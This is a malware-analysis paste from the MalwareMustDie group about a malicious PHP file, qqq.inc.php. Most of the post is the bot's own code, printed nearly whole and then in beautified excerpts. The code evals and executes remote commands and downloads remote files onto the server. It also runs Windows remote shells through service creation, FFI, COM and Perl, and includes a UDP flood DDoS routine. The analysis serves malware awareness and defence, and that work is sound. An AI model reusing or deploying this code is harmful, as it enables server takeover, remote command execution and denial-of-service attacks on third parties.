
qqq.inc.php PHP Hacks aimed DDoS & Windows Remote Shell

MalwareMustDie Jan 5th, 2014 578 Never
  1. # MalwareMustDie Awareness Post
  2. # Case: Webapp/PHP (Read: Web Hacking)
  3. # Target OS: Windows (with PHP and/or Perl)
  4. # Interface: PHP (flaw), Perl (shell), FTP (hacks) — remote Windows executable environment/commands
  5. # Path: /qqq.inc.php
  6. # UDP Flood, Services Remote Control, API Remote Shell
  7. # Credit: Malware Hunter @malpush (twitter)
  8.  
  9. // Spotted base code (plain or after obfuscation)
  10.  
  11. 1) { $evaled = ""; for($i = 1; $i < count($command); $i++) $evaled .= $command[$i];
  12. if($lasteval != $evaled) { eval($evaled); $lasteval = $evaled; } } if($command[0] ==
  13.  "eval" && count($command) > 1) { $evaled = ""; for($i = 1; $i < count($command); $i
  14. ++) $evaled .= $command[$i]; eval($evaled); } if($command[0] == "execonce" && count(
  15. $command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec .= $c
  16. ommand[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); if($lastexe
  17. c != $toexec) { Exe($toexec); $lastexec = $toexec; } } if($command[0] == "exec" && c
  18. ount($command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec
  19. .= $command[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); Exe($t
  20. oexec); } if($command[0] == "downonce" && count($command) == 3) { $command[1] = str_
  21. replace("%LOLTMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTM
  22. PLOL%", whereistmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command);
  23. $i++) $todown .= $command[$i]; if($lastdown != $todown) { $content = @file_get_conte
  24. nts($command[1]); file_put_contents($command[2], $content); $lastdown = $todown; } }
  25.  if($command[0] == "down" && count($command) == 3) { $command[1] = str_replace("%LOL
  26. TMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTMPLOL%", where
  27. istmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command); $i++) $todown
  28.  .= $command[$i]; $content = @file_get_contents($command[1]); file_put_contents($com
  29. mand[2], $content); } $end = time(); $left = $time - ($end - $start); if($left > 0)
  30. sleep($left); } } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=
  31. getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path
  32. '); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_wr
  33. itable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))retur
  34. n '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if
  35. (is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))retu
  36. rn $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_w
  37. ritable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))re
  38. turn $envtmp; return '.'; } function srvshelL($command) { $name=whereistmP()."\\".un
  39. iqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system3
  40. 2\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=
  41. >$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win3
  42. 2_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $e
  43. xec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($comm
  44. and) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int
  45. WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0)
  46. ; while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name);
  47.  return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $comm
  48. and"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) {
  49. $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_cont
  50. ents(); ob_end_clean(); return $exec; } function Exe($command) { $exec=$output=''; $
  51. dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob
  52. _start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} els
  53. eif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$
  54. output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@ex
  55. ec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exis
  56. ts('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$outp
  57. ut=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);
  58. } elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!
  59. feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($re
  60. s);} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3))
  61.  === 'WIN')$exec=winshelL($command); elseif(function_exists('win32_create_service')
  62. && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command); elseif(exten
  63. sion_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($com
  64. mand); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } fu
  65. nction udpflood($host,$port,$time,$packetsize) { $packet = ""; for($i=0;$i<$packetsi
  66. ze;$i++) { $packet .= chr(rand(1,256)); } $end = time() + $time; $multitarget = fals
  67. e; if(strpos($host, ",") !== FALSE) { $multitarget = true; $host = explode(",", $hos
  68. t); } $i = 0; if($multitarget) { $fp = array(); foreach($host as $hostt) $fp[] = fso
  69. ckopen("udp://".$hostt,$port,$e,$s,5); $count = count($host); while(true) { fwrite($
  70. fp[$i % $count],$packet); fflush($fp[$i % $count]); if($i % 100 == 0) { if($end < ti
  71. me()) break; } $i++; } foreach($fp as $fpp) fclose($fpp); } else { $fp = fsockopen("
  72. udp://".$host,$port,$e,$s,5); while(true) { fwrite($fp,$packet); fflush($fp); if($i
  73. % 100 == 0) { if($end < time()) break; } $i++; } fclose($fp); } $env = $i *
  74.  $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel);
  75. $env = round($env); }
  76.  
  77. // -----------------------------------------------------
  78. // Below is a partial breakdown of the
  79. // malicious functions (after beautification)
  80. // -----------------------------------------------------
  81.  
  82. // PoC conditions used for remote control:
  83.  
  84. elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) ===
  85. 'WIN') $exec = winshelL($command);
  86. elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) ===
  87. 'WIN') $exec = srvshelL($command);
  88. elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec =
  89. ffishelL($command);
  90. elseif (extension_loaded('perl')) $exec = perlshelL($command);
  91. return $exec;
  92. }
  93.  
  94. // DDoS / UDP Flooder:
  95.  
  96. function udpflood($host, $port, $time, $packetsize)
  97. {
  98. $packet = "";
  99. for ($i = 0; $i < $packetsize; $i++)
  100. {
  101. $packet.= chr(rand(1, 256));
  102. }
  103.  
  104. $end = time() + $time;
  105. $multitarget = false;
  106. if (strpos($host, ",") !== FALSE)
  107. {
  108. $multitarget = true;
  109. $host = explode(",", $host);
  110. }
  111.  
  112. $i = 0;
  113. if ($multitarget)
  114. {
  115. $fp = array();
  116. foreach($host as $hostt) $fp[] = fsockopen("udp://" . $hostt, $port, $e, $s, 5);
  117. $count = count($host);
  118. while (true)
  119. {
  120. fwrite($fp[$i % $count], $packet);
  121. fflush($fp[$i % $count]);
  122. if ($i % 100 == 0)
  123. {
  124. if ($end < time()) break;
  125. }
  126.  
  127. $i++;
  128. }
  129.  
  130. foreach($fp as $fpp) fclose($fpp);
  131. }
  132.   else
  133. {
  134. $fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
  135. while (true)
  136. {
  137. fwrite($fp, $packet);
  138. fflush($fp);
  139. if ($i % 100 == 0)
  140. {
  141. if ($end < time()) break;
  142. }
  143.  
  144. $i++;
  145. }
  146.  
  147. fclose($fp);
  148. }
  149.  
  150. $env = $i * $packetsize;
  151. $env = $env / 1048576;
  152. $vel = $env / $time;
  153. $vel = round($vel);
  154. $env = round($env);
  155. }
  156.  
  157. // Remote shell (Windows EXE)
  158.  
  159. $output = join("\n", $output);
  160. $exec = $output;
  161. }
  162. elseif (function_exists('shell_exec')) $exec = @shell_exec($command);
  163. elseif (function_exists('popen'))
  164. {
  165. $output = @popen($command, 'r');
  166. while (!feof($output))
  167. {
  168. $exec = fgets($output);
  169. }
  170.  
  171. pclose($output);
  172. }
  173. elseif (function_exists('proc_open'))
  174. {
  175. $res = @proc_open($command, $dep, $pipes);
  176. while (!feof($pipes[1]))
  177. {
  178. $line = fgets($pipes[1]);
  179. $output.= $line;
  180. }
  181.  
  182. $exec = $output;
  183. proc_close($res);
  184. }
  185. elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = winshelL($command);
  186. elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = srvshelL($command);
  187. elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = ffishelL($command);
  188. elseif (extension_loaded('perl')) $exec = perlshelL($command);
  189. return $exec;}
  190.  
  191. // Perl Shell:
  192.  
  193.  
  194. function perlshelL($command)
  195. {
  196. $perl = new perl();
  197. ob_start();
  198. $perl->eval("system(\"$command\")");
  199. $exec = ob_get_contents();
  200. ob_end_clean();
  201. return $exec;
  202. }
  203.  
  204. // CMD Shell
  205.  
  206. function comshelL($command, $ws)
  207. {
  208. $exec = $ws->exec("cmd.exe /c $command");
  209. $so = $exec->StdOut();
  210. return $so->ReadAll();
  211. }
  212.  
  213. // ffishell
  214.  
  215. function ffishelL($command)
  216. {
  217. $name = whereistmP() . "\\" . uniqid('NJ');
  218. $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  219. $res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
  220. while (!file_exists($name)) sleep(1);
  221. $exec = file_get_contents($name);
  222. unlink($name);
  223. return $exec;
  224.  
  225. // And much more information, exclusive to MMD forum members.
  226.  
  227. # MalwareMustDie!!
  228. # Reported by @unixfreaxjp | $ date
  229. Sun Jan  5 22:21:58 JST 2014